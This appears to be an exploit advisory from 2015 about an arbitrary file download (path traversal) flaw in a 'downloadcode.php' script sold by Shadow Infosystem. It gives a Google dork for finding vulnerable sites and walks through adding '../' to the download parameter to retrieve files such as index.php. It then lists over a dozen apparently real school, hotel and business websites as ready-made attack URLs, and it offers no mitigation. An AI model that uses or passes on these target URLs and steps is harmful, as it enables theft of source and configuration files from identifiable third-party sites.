|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Shadow Infosystem Arbitrary File Download |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://shadowinfosystem.com |[+] |[+] Google Dork: inurl:/downloadcode.php |[+] |[+] Tested on: Windows, Linux |[+] |[+] Date: 2015.09.21 |[+] |--------------------------------------------------------------| |[+] Describe : |[+] |[+] At the first search dork and choose a target |[+] |[+] Like this : http://www.spacetechgroup.in |[+] |[+] Add this to the end of target URL: downloadcode.php?d= |[+] |[+] After [?d=] you should enter your file name that you want to download! |[+] |[+] Fore example download in that target index.php: |[+] |[+] http://www.spacetechgroup.in/downloadcode.php?d=../index.php |[+] |[+] In some targets you can only download files that they're in [Current] directory! |[+] |[+] But I don't want to download from [file] directory! |[+] |[+] Then I put [../] after file name to upload from root directory! |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://stteresaschool.in/downloadcode.php?d=../index.php |[+] |[+] http://hotelsroyalpark.coM/downloadcode.php?d=../index.php |[+] |[+] http://jkgttAcademy.com/downloadcode.php?d=index.php |[+] |[+] http://raksHatowersgurgaon.com/downloadcode.php?d=../index.php |[+] |[+] http://shaDowInfosystem.com/downloadcode.php?d=../index.php |[+] |[+] http://keltecHgroup.com/downloadcode.php?download_file=index.php |[+] |[+] http://fnfhomez.com/downloadcode.php?df=../index.php |[+] |[+] http://renownedInfra.com/downloadcode.php?download_file=../index.php |[+] |[+] http://mmgroupinDia.com/downloadcode.php?df=../index.php |[+] |[+] http://sunflowerpublicschool.com/downloadcode.php?file=../index.php |[+] |[+] http://hitchintak.in/downloadcode.php?d=../index.php |[+] |[+] http://ballyhai.net/downloadcode.php?file=../index.php |[+] |[+] http://spacetechgroup.in/downloadcode.php?d=../index.php |--------------------------------------------------------------| |[+] Vulnerable Code: |[+] File: downloadcode.php: |--------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : Cloner-47 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|